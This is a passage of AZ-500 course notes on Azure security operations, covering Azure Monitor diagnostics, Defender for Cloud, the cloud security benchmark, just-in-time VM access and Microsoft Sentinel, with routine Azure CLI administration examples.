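          --severity 2 \
          --description "CPU above 70% for 5 minutes"
        ```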

        You can alert on metrics and logs. These include but are not limited to:

        • Metric values
        • Log search queries
        • Activity log events
        • Health of the underlying Azure platform
        • Tests for website availability

        With the consolidation of alerting services still in process, there are some alerting capabilities that are not yet in the new alerts system.

        | Monitor source | Signal type | Description |
        | --- | --- | --- |
        | Service health | Activity log | Not supported. View Create activity log alerts on service notifications. |
        | Application Insights | Web availability tests | Not supported. View Web test alerts. Available to any website that's instrumented to send data to Application Insights. Receive a notification when availability or responsiveness of a website is below expectations. |
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#16-create-diagnostic-settings-in-azure-portal","title":"1.6. Create diagnostic settings in Azure portal","text":"

        Azure Monitor diagnostic logs are logs produced by an Azure service that provide rich, frequently collected data about the operation of that service. Azure Monitor makes two types of diagnostic logs available:

        • Tenant logs. These logs come from tenant-level services that exist outside an Azure subscription, such as Microsoft Entra ID.
        • Resource logs. These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups (NSGs) or storage accounts.

        These logs differ from the activity log. The activity log provides insight into the operations, such as creating a VM or deleting a logic app, that Azure Resource Manager performed on resources in your subscription. The activity log is a subscription-level log. Resource-level diagnostic logs provide insight into operations that were performed within that resource itself, such as getting a secret from a key vault.

        These logs also differ from\u00a0guest operating system (OS)\u2013level diagnostic logs. Guest OS diagnostic logs are those collected by an agent running inside a VM or other supported resource type. Resource-level diagnostic logs require no agent and capture resource-specific data from the Azure platform itself, whereas guest OS\u2013level diagnostic logs capture data from the OS and applications running on a VM.

        You can configure diagnostic settings in the Azure portal either from the Azure Monitor menu or from the menu for the resource.

        Here are some of the things you can do with diagnostic logs:

        • Save them to a storage account for auditing or manual inspection. You can specify the retention time (in days) by using resource diagnostic settings.
        • Stream them to event hubs for ingestion by a third-party service or custom analytics solution, such as Power BI. An event hub is created in the namespace for each log category you enable. (A diagnostic log category is a type of log that a resource may collect.)
        • Analyze them with Azure Monitor, such that the data is immediately written to Azure Monitor with no need to first write the data to storage.
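        A hedged CLI sketch of a diagnostic setting that sends a Key Vault's logs and metrics to a Log Analytics workspace; the resource IDs and the category names are placeholders, and available categories vary by resource type:

        ```bash
        # Route the vault's audit log and all metrics to the workspace.
        az monitor diagnostic-settings create \
          --name kv-diagnostics \
          --resource "/subscriptions/<sub-id>/resourceGroups/rg-demo/providers/Microsoft.KeyVault/vaults/kv-demo" \
          --workspace "/subscriptions/<sub-id>/resourceGroups/rg-demo/providers/Microsoft.OperationalInsights/workspaces/law-demo" \
          --logs '[{"category": "AuditEvent", "enabled": true}]' \
          --metrics '[{"category": "AllMetrics", "enabled": true}]'
        ```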

        Kusto Query Language. All data is retrieved from a Log Analytics workspace using a log query written using Kusto Query Language (KQL). You can write your own queries or use solutions and insights that include log queries for an application or service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#2-enable-and-manage-microsoft-defender-for-cloud","title":"2. Enable and manage Microsoft Defender for Cloud","text":"

        Microsoft Defender for Cloud is your central location for setting and monitoring your organization's security posture.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#21-the-mitre-attack-matrix","title":"2.1. The MITRE Attack matrix","text":"

        The MITRE ATT&CK matrix is a\u00a0publicly accessible knowledge base\u00a0for understanding the various\u00a0tactics\u00a0and\u00a0techniques\u00a0used by attackers during a cyberattack.

        The knowledge base is organized into several categories:\u00a0pre-attack,\u00a0initial access,\u00a0execution,\u00a0persistence,\u00a0privilege escalation,\u00a0defense evasion,\u00a0credential access,\u00a0discovery,\u00a0lateral movement,\u00a0collection,\u00a0exfiltration, and\u00a0command and control.

        Tactics (T)\u00a0represent the \"why\" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.\u00a0For example, an adversary may want to achieve credential access.

        Techniques (T) represent \"how\" an adversary achieves a tactical goal by performing an action. For example, an adversary may dump credentials to achieve credential access.

        Common Knowledge (CK)\u00a0in ATT&CK stands for common knowledge, essentially the documented modus operandi of tactics and techniques executed by adversaries.

        Defender for Cloud\u00a0uses the MITRE Attack matrix to associate alerts with their perceived intent, helping formalize security domain knowledge.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#22-implement-microsoft-defender-for-cloud","title":"2.2. Implement Microsoft Defender for Cloud","text":"

        Microsoft Defender for Cloud is a solution for\u00a0cloud security posture management (CSPM)\u00a0and\u00a0cloud workload protection (CWP)\u00a0that finds weak spots across your cloud configuration, helps strengthen the overall security posture of your environment, and can protect workloads across multicloud and hybrid environments from evolving threats.

        When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multicloud environments,\u00a0Microsoft Defender plans are extended to non-Azure machines\u00a0with the help of\u00a0Azure Arc.\u00a0Cloud Security Posture Management (CSPM) features\u00a0are extended to multicloud machines without the need for any agents.

        In addition to defending your Azure environment, you can\u00a0add Defender for Cloud capabilities to your hybrid cloud environment to protect your non-Azure servers. To\u00a0extend protection\u00a0to on-premises machines,\u00a0deploy Azure Arc\u00a0and\u00a0enable Defender for Cloud's enhanced security features.
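        As a sketch, the enhanced security features map to Defender plans that can be enabled per subscription from the CLI; the plan name below is one example, so list the plans first:

        ```bash
        # Show the current pricing tier of each Defender plan, then enable
        # the Servers plan (VirtualMachines) at the standard (paid) tier.
        az security pricing list --output table
        az security pricing create --name VirtualMachines --tier Standard
        ```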

        For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

        • Defender for Cloud's CSPM features\u00a0extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and these are included in your secure score. The resources will also be assessed for compliance with built-in standards specific to\u00a0AWS (AWS Center for Internet Security (CIS),\u00a0AWS Payment Card Industry (PCI) Data Security Standards (DSS), and\u00a0AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multicloud enabled feature helping you manage your AWS resources alongside your Azure resources.
        • Microsoft Defender for Kubernetes extends\u00a0its container threat detection and advanced defenses to your Amazon Elastic Kubernetes Service (EKS) Linux clusters.
        • Microsoft Defender for Servers\u00a0brings threat detection and advanced defenses to your Windows and Linux Elastic Compute Cloud 2 (EC2) instances. This plan includes the integrated license for Microsoft Defender for Endpoint, security baselines, and OS level assessments, vulnerability assessment scanning, adaptive application controls (AAC), file integrity monitoring (FIM), and more.

        Defender for Cloud includes vulnerability assessment solutions for\u00a0virtual machines, container registries, and\u00a0SQL servers\u00a0as part of the enhanced security features. Some of the scanners are powered by Qualys. But you don't need a Qualys license or even a Qualys account - everything's handled seamlessly inside Defender for Cloud.

        Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint. With this integration enabled, you'll have access to the vulnerability findings from Microsoft Defender Vulnerability Management.

        The list of recommendations is enabled and supported by the Microsoft cloud security benchmark. This Microsoft-authored benchmark, based on common compliance frameworks, began with Azure and now provides a set of guidelines for security and compliance best practices for multiple cloud environments. In this way, Defender for Cloud enables you not just to set security policies but to\u00a0apply secure configuration standards across your resources.

        Microsoft Defender for the\u00a0Internet of Things (IoT)\u00a0is a separate product.

        The\u00a0Defender plans\u00a0of Microsoft Defender for Cloud offer comprehensive defenses for the\u00a0compute,\u00a0data, and\u00a0service layers\u00a0of your environment:

        • Microsoft Defender for Servers
        • Microsoft Defender for Storage
        • Microsoft Defender for Structured Query Language (SQL)
        • Microsoft Defender for Containers
        • Microsoft Defender for App Service
        • Microsoft Defender for Key Vault
        • Microsoft Defender for Resource Manager
        • Microsoft Defender for Domain Name System (DNS)
        • Microsoft Defender for open-source relational databases
        • Microsoft Defender for Azure Cosmos Database (DB)
        • Defender Cloud Security Posture Management (CSPM)
          • Security governance and regulatory compliance
          • Cloud security explorer
          • Attack path analysis
          • Agentless scanning for machines
        • Defender for DevOps
        • Security alerts\u00a0- When Defender for Cloud\u00a0detects a threat\u00a0in any area of your environment, it\u00a0generates a security alert. These alerts describe details of the\u00a0affected resources,\u00a0suggested remediation steps, and in some cases, an\u00a0option to trigger a logic app in response. Whether an alert is generated by Defender for Cloud or received by Defender for Cloud from an integrated security product, you can export it. To export your alerts to Microsoft Sentinel, any third-party Security information and event management (SIEM), or any other external tool, follow the instructions in Stream alerts to a SIEM, Security orchestration, automation and response (SOAR), or IT Service Management solution. Defender for Cloud's threat protection includes\u00a0fusion kill-chain analysis, which automatically correlates alerts in your environment based on cyber kill-chain analysis, to help you better understand the full story of an attack campaign, where it started, and what kind of impact it had on your resources.\u00a0Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#23-cloud-security-posture-management-cspm-remediate-security-issues-and-watch-your-security-posture-improve-security-posture-tab-regulatory-compliance-tab","title":"2.3. Cloud Security Posture Management (CSPM) - Remediate security issues and watch your security posture improve - Security posture tab + Regulatory compliance tab","text":"

        Defender for Cloud continually assesses your resources, subscriptions, and organization for security issues and shows your security posture in the secure score, an aggregated score of the security findings that tells you, at a glance, your current security situation: the higher the score, the lower the identified risk level.

        • Generates a secure score\u00a0for your subscriptions based on an assessment of your connected resources compared with the guidance in the\u00a0Microsoft cloud security benchmark.
        • Provides hardening recommendations\u00a0based on any\u00a0identified security misconfigurations\u00a0and\u00a0weaknesses.
        • Analyzes and secures your attack paths through the cloud security graph, which is a graph-based context engine that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.
        • Attack path analysis is a\u00a0graph-based algorithm that scans the cloud security graph. The\u00a0scans expose exploitable paths attackers may use to breach your environment to reach your high-impact assets.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#24-workload-protections-tab","title":"2.4. Workload protections tab","text":"

        Defender for Cloud offers security alerts that are powered by Microsoft Threat Intelligence. It also includes a range of advanced, intelligent protections for your workloads. The workload protections are provided through Microsoft Defender plans specific to the types of resources in your subscriptions.

        The Cloud workload dashboard includes the following sections:

        1. Microsoft Defender for Cloud coverage - Here you can see the resource types in your subscription that are eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select Upgrade all.
        2. Security alerts\u00a0- When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to\u00a0trigger a logic app\u00a0in response. Selecting anywhere in this graph opens the Security alerts page.
        3. Advanced protection\u00a0- Defender for Cloud includes many advanced threat protection capabilities for virtual machines,\u00a0Structured Query Language (SQL)\u00a0databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type.
        4. Insights\u00a0- This rolling pane of news, suggested reading, and high priority alerts gives Defender for Cloud's insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high severity\u00a0Common Vulnerabilities and Exposures (CVEs)\u00a0discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#25-deploy-microsoft-defender-for-cloud","title":"2.5. Deploy Microsoft Defender for Cloud","text":"

        Defender for Cloud provides foundational\u00a0cloud security and posture management (CSPM)\u00a0features by default.

        Defender for Cloud offers foundational multicloud CSPM capabilities for free. The foundational CSPM includes a secure score, security policy and basic recommendations, and network security assessment to help you protect your Azure resources.

        The optional Defender CSPM plan provides advanced posture management capabilities such as\u00a0Attack path analysis,\u00a0Cloud security explorer,\u00a0advanced threat hunting,\u00a0security governance capabilities, and also tools to assess your security compliance with a wide range of benchmarks, regulatory standards, and any custom security policies required in your organization, industry, or region.

        When you enable Defender plans on an entire Azure subscription, the protections are inherited by all resources in the subscription. When you enable the enhanced security features (paid), Defender for Cloud can provide unified security management and threat protection across your hybrid cloud workloads, including:

        • Microsoft Defender for Endpoint\u00a0- Microsoft Defender for Servers includes Microsoft Defender for Endpoint for comprehensive endpoint detection and response (EDR).

        • Vulnerability assessment for virtual machines, container registries, and SQL resources

        • Multicloud security\u00a0- Connect your accounts from Amazon Web Services (AWS) and Google Cloud Platform (GCP) to protect resources and workloads on those platforms with a range of Microsoft Defender for Cloud security features.

        • Hybrid security\u00a0\u2013 Get a unified view of security across all of your on-premises and cloud workloads.

        • Threat protection alerts\u00a0- Advanced behavioral analytics and the Microsoft Intelligent Security Graph provide an edge over evolving cyber-attacks. Built-in behavioral analytics and machine learning can identify attacks and zero-day exploits. Monitor networks, machines, data stores (SQL servers hosted inside and outside Azure, Azure SQL databases, Azure SQL Managed Instance, and Azure Storage), and cloud services for incoming attacks and post-breach activity. Streamline investigation with interactive tools and contextual threat intelligence.

        • Track compliance with a range of standards\u00a0- Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the Microsoft cloud security benchmark. When you enable enhanced security features, you can apply a range of other industry standards, regulatory standards, and benchmarks according to your organization's needs. Add standards and track your compliance with them from the regulatory compliance dashboard.

        • Access and application controls\u00a0- Block malware and other unwanted applications by applying machine learning-powered recommendations adapted to your specific workloads to create allowlists and blocklists. Reduce the network attack surface with just-in-time, controlled access to management ports on Azure VMs. Access and application control drastically reduce exposure to brute force and other network attacks.

        • Container security features\u00a0- Benefit from vulnerability management and real-time threat protection in your containerized environments. Charges are based on the number of unique container images pushed to your connected registry. After an image has been scanned once, you won't be charged for it again unless it's modified and pushed once more.

        • Breadth threat protection for resources connected to Azure\u00a0- Cloud-native threat protection for the Azure services common to all of your resources: Azure Resource Manager, Azure Domain Name System (DNS), Azure network layer, and Azure Key Vault. Defender for Cloud has unique visibility into the Azure management layer and the Azure DNS layer and can therefore protect cloud resources that are connected to those layers.

        Manage your Cloud Security Posture Management (CSPM)\u00a0- CSPM offers you the ability to remediate security issues and review your security posture through the tools provided. These tools include:

        • Security governance and regulatory compliance
          • What is Security governance and regulatory compliance? Security governance and regulatory compliance refer to the policies and processes which organizations have in place to ensure that they comply with laws, rules, and regulations put in place by external bodies (government) that control activity in a given jurisdiction. Defender for Cloud allows you to view your regulatory compliance through the regulatory compliance dashboard. Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the standards you've applied to your subscriptions. The dashboard reflects the status of your compliance with these standards.
        • Cloud security graph
          • What is a cloud security graph? The cloud security graph is a\u00a0graph-based context engine\u00a0that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.\u00a0For example, the cloud assets inventory, connections and lateral movement possibilities between resources, exposure to the internet, permissions, network connections, vulnerabilities, and more. The data collected is then used to build a graph representing your multicloud environment. Defender for Cloud then uses the generated graph to perform an attack path analysis and find the issues with the highest risk that exist within your environment. You can also query the graph using the cloud security explorer.
        • Attack path analysis
          • What is Attack path analysis? Attack path analysis helps you to\u00a0address the security issues that pose immediate threats with the greatest potential of being exploited in your environment. Defender for Cloud analyzes which security issues are part of potential attack paths that attackers could use to breach your environment. It also highlights the security recommendations that need to be resolved in order to mitigate the issue.
        • Agentless scanning for machines
          • What is agentless scanning for machines? Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact.\u00a0Agentless scanning for VMs provides vulnerability assessment and software inventory\u00a0powered by Defender vulnerability management in Azure and Amazon AWS environments. Agentless scanning is available in Defender Cloud Security Posture Management (CSPM) and Defender for Servers.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#26-azure-arc","title":"2.6. Azure Arc","text":"

        Azure Arc provides a centralized, unified way to:

        • Manage your entire environment together by projecting your existing non-Azure and/or on-premises resources into Azure Resource Manager.
        • Manage virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
        • Use familiar Azure services and management capabilities, regardless of where they live.
        • Continue using traditional IT operations (ITOps) while introducing DevOps practices to support new cloud-native patterns in your environment.
        • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

        Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

        • Servers: Manage Windows and Linux physical servers and virtual machines hosted outside of Azure.
        • Kubernetes clusters: Attach and configure Kubernetes clusters running anywhere with multiple supported distributions.
        • Azure data services: Run Azure data services on-premises, at the edge, and in public clouds using Kubernetes and the infrastructure of your choice. SQL Managed Instance and PostgreSQL server (preview) services are currently available.
        • SQL Server: Extend Azure services to SQL Server instances hosted outside of Azure.
        • Virtual machines (preview): Provision, resize, delete, and manage virtual machines based on VMware vSphere or Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0and enable VM self-service through role-based access.
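        A hedged sketch of onboarding a non-Azure server: after installing the Connected Machine agent (azcmagent) on the server, run the connect command on the machine itself; all values below are placeholders:

        ```bash
        # Project this machine into Azure Resource Manager via Azure Arc.
        # The command prompts for sign-in unless a service principal is given.
        azcmagent connect \
          --resource-group "rg-arc" \
          --tenant-id "<tenant-id>" \
          --subscription-id "<sub-id>" \
          --location "westeurope"
        ```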

        Some of the key scenarios that Azure Arc supports are:

        • Implement consistent inventory, management, governance, and security for servers across your environment.
        • Configure Azure VM extensions to use Azure management services to monitor, secure, and update your servers.
        • Manage and govern Kubernetes clusters at scale.
        • Use GitOps to deploy configuration across one or more clusters from Git repositories.
        • Zero-touch compliance and configuration for Kubernetes clusters using Azure Policy.
        • Run Azure data services on any Kubernetes environment as if it runs in Azure (specifically Azure SQL Managed Instance and Azure Database for PostgreSQL server, with benefits such as upgrades, updates, security, and monitoring). Use elastic scale and apply updates without any application downtime, even without continuous connection to Azure.
        • Create custom locations on top of your Azure Arc-enabled Kubernetes clusters, using them as target locations for deploying Azure services instances. Deploy your Azure service cluster extensions for Azure Arc-enabled data services, App services on Azure Arc (including web, function, and logic apps), and Event Grid on Kubernetes.
        • Perform virtual machine lifecycle and management operations for VMware vSphere and Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0environments.
        • A unified experience viewing your Azure Arc-enabled resources, whether you are using the Azure portal, the Azure CLI, Azure PowerShell, or Azure REST API.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#27-microsoft-cloud-security-benchmark","title":"2.7. Microsoft cloud security benchmark","text":"

        Located at Defender > Regulatory compliance

        The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides\u00a0prescriptive best practices\u00a0and\u00a0recommendations\u00a0to help improve the security of workloads, data, and services on Azure and your multi-cloud environment, focusing on cloud-centric control areas with input from a set of holistic Microsoft and industry security guidance that includes:

        • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
        • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
        • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
        • Other industry and cloud service providers' security best practice standards and frameworks: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).
        | Control Domain | Description |
        | --- | --- |
        | Network security (NS) | Covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). |
        | Identity Management (IM) | Covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. |
        | Privileged Access (PA) | Covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. |
        | Data Protection (DP) | Covers control of data protection at rest, in transit, and via authorized access mechanisms, including discovering, classifying, protecting, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. |
        | Asset Management (AM) | Covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory, and managing approvals for services and resources (inventory, track, and correct). |
        | Logging and Threat Detection (LT) | Covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a security event management (SEM) solution, time synchronization, and log retention. |
        | Incident Response (IR) | Covers controls in the incident response life cycle: preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. |
        | Posture and Vulnerability Management (PV) | Focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. |
        | Endpoint Security (ES) | Covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware services for endpoints in cloud environments. |
        | Backup and Recovery (BR) | Covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. |
        | DevOps Security (DS) | Covers the controls related to security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure security throughout the DevOps process; it also includes common topics such as threat modeling and software supply chain security. |
        | Governance and Strategy (GS) | Provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards. |
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#28-security-policies-and-defender-for-cloud-initiatives","title":"2.8. Security policies and Defender for Cloud initiatives","text":"

        Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You can use\u00a0Azure Policy\u00a0to manage your policies, build initiatives, and assign initiatives to multiple subscriptions or entire management groups.

        The default initiative automatically assigned to every subscription in Microsoft Defender for Cloud is the Microsoft cloud security benchmark.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#29-view-and-edit-security-policies","title":"2.9. View and edit security policies","text":"

        There are two specific roles for Defender for Cloud:

        1. Security Administrator: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.
        2. Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

        You can edit security policies through the\u00a0Azure Policy portal\u00a0via\u00a0Representational State Transfer Application Programming Interface (REST API)\u00a0or using\u00a0Windows PowerShell.

        The Security Policy screen reflects the action taken by the policies assigned to the subscription or management group you selected.

        • Use the links at the top to open a policy assignment that applies to the subscription or management group. These links let you access the assignment and edit or disable the policy.\u00a0For example, if you see that a particular policy assignment is effectively denying endpoint protection, use the link to edit or disable the policy.
        • In the list of policies, you can see the effective application of the policy on your subscription or management group. The settings of each policy that apply to the scope are taken into consideration, and the cumulative outcome of actions taken by the policy is shown.\u00a0For example, if one assignment of the policy is disabled, but in another, it's set to\u00a0AuditIfNotExist, then the cumulative effect applies\u00a0AuditIfNotExist. The more active effect always takes precedence.
        • The policies' effect can be:\u00a0Append,\u00a0Audit,\u00a0AuditIfNotExists,\u00a0Deny,\u00a0DeployIfNotExists, or\u00a0Disabled.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#210-microsoft-defender-for-cloud-recommendations","title":"2.10. Microsoft Defender for Cloud recommendations","text":"

        In practice, it works like this:

        1. Microsoft Cloud security benchmark is an\u00a0initiative\u00a0that contains requirements.

          For example, Azure Storage accounts must restrict network access to reduce their attack surface.

        2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative.

          To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

        3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements.

          For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you see the recommendation to harden those resources.

        So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.

        Defender for Cloud continually assesses your cross-cloud resources for security issues. It then\u00a0aggregates all the findings into a single score\u00a0so that you can tell, at a glance, your current security situation: the\u00a0higher the score, the\u00a0lower the identified risk level.
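        The aggregated score can also be read from the CLI; a sketch, assuming a recent Azure CLI version in which the secure-score command groups are available:

        ```bash
        # List the secure score(s) and the per-control breakdown for the
        # current subscription.
        az security secure-scores list --output table
        az security secure-score-controls list --output table
        ```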

        In the Azure mobile app, the secure score is shown as a percentage value, and you can tap the secure score to see the details that explain the score.

        To increase your security, review Defender for Cloud's\u00a0recommendations page\u00a0and remediate the recommendation by implementing the remediation instructions for each issue.\u00a0Recommendations are grouped into security controls. Each control is a\u00a0logical group of related security recommendations\u00a0and\u00a0reflects your vulnerable attack surfaces. Your score only improves when you\u00a0remediate all\u00a0of the recommendations for a\u00a0single resource within a control.

        • Insights - Gives you extra details for each recommendation, such as:

          • Preview recommendation\u00a0- This recommendation won't affect your secure score until\u00a0general availability (GA).
          • Fix\u00a0- From within the recommendation details page, you can use 'Fix' to resolve this issue.
          • Enforce\u00a0- From within the recommendation details page, you can automatically deploy a policy to fix this issue whenever someone creates a non-compliant resource.
          • Deny\u00a0- From within the recommendation details page, you can prevent new resources from being created with this issue.

        Which recommendations are included in the secure score calculations?

        • Only built-in recommendations have an impact on the secure score.
        • Recommendations flagged as Preview aren't included in the calculations of your secure score. They should still be remediated wherever possible so that when the preview period ends, they'll contribute towards your score.
        • Preview recommendations are marked with a preview icon in the recommendations list.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#211-brute-force-attacks","title":"2.11. Brute force attacks","text":"

        To counteract brute-force attacks, you can take multiple measures such as:

        • Disable the public IP address and use one of these connection methods:
          • Use a point-to-site virtual private network (VPN)
          • Create a site-to-site VPN
          • Use Azure ExpressRoute to create secure links from your on-premises network to Azure
        • Require two-factor authentication
        • Increase password length and complexity
        • Limit login attempts
        • Limit the amount of time that the ports are open
        • Implement CAPTCHA
          • About CAPTCHAs - Any time you let people register on your site or even enter a name and URL (like for a blog comment), you might get a flood of fake names. These are often left by automated programs (bots) that try to leave URLs on every website they can find. (A common motivation is to post the URLs of products for sale.) You can help make sure that a user is a real person and not a computer program by using a CAPTCHA to validate users when they register or otherwise enter their name and site.
          • CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. A CAPTCHA is a challenge-response test in which the user is asked to do something that is easy for a person to do but hard for an automated program to do. The most common type of CAPTCHA is one where you see distorted letters and are asked to type them. (The distortion is supposed to make it hard for bots to decipher the letters.)
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#just-in-time-vm-access","title":"Just-in-time VM access","text":"

        Threat actors actively hunt accessible machines with open management ports, like\u00a0remote desktop protocol (RDP)\u00a0or\u00a0secure shell protocol (SSH). All of your virtual machines are potential targets for an attack. When a VM is successfully compromised, it's used as the entry point to attack further resources within your environment.

        Defender for Cloud applies specific logic when deciding how to categorize each supported VM. When it finds a machine that can benefit from JIT, it adds that machine to the recommendation's Unhealthy resources tab.

        Just-in-time (JIT) virtual machine (VM) access is used to lock down inbound traffic to your Azure VMs, reducing exposure to attacks while providing easy access to connect to VMs when needed. When you enable JIT VM Access for your VMs, you next create a policy that determines the ports to help protect, how long ports should remain open, and the approved IP addresses that can access these ports. The policy helps you stay in control of what users can do when they request access. Requests are logged in the Azure activity log, so you can easily monitor and audit access. The policy will also help you quickly identify the existing VMs that have JIT VM Access enabled and the VMs where JIT VM Access is recommended.
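        A small sketch for inspecting JIT policies from the CLI; creating policies and requesting access are typically done in the portal or through the Microsoft.Security REST API:

        ```bash
        # List the just-in-time VM access policies defined in the subscription.
        az security jit-policy list --output table
        ```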

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#3-configure-and-monitor-microsoft-sentinel","title":"3. Configure and monitor Microsoft Sentinel","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#31-what-is-microsoft-sentinel","title":"3.1. What is Microsoft Sentinel","text":"

        Microsoft Sentinel is a scalable, cloud-native, security information event management (SIEM) and security orchestration automated response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.

        Think of Microsoft Sentinel as the first\u00a0SIEM-as-a-service\u00a0that brings the power of the cloud and artificial intelligence to help security operations teams efficiently identify and stop cyber-attacks before they cause harm.

        Microsoft Sentinel integrates with Microsoft 365 solutions and correlates millions of signals from different products such as:

        • Azure Identity Protection
        • Microsoft Cloud App Security
        • and soon Azure Advanced Threat Protection, Windows Advanced Threat Protection, M365 Advanced Threat Protection, Intune, and Azure Information Protection

        It enables the following services:

        • Collect data at cloud scale\u00a0across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.
        • Detect previously undetected threats, and minimize false positives using Microsoft's analytics and unparalleled threat intelligence.
        • Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cyber security work at Microsoft.
        • Respond to incidents rapidly\u00a0with built-in orchestration and automation of common tasks.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#configure-data-connections-to-sentinel","title":"Configure data connections to Sentinel","text":"

        To onboard Microsoft Sentinel, these are the global prerequisites:

        • Active Azure Subscription
        • Log Analytics workspace.
        • To enable Microsoft Sentinel, you need contributor permissions to the subscription in which the Microsoft Sentinel workspace resides.
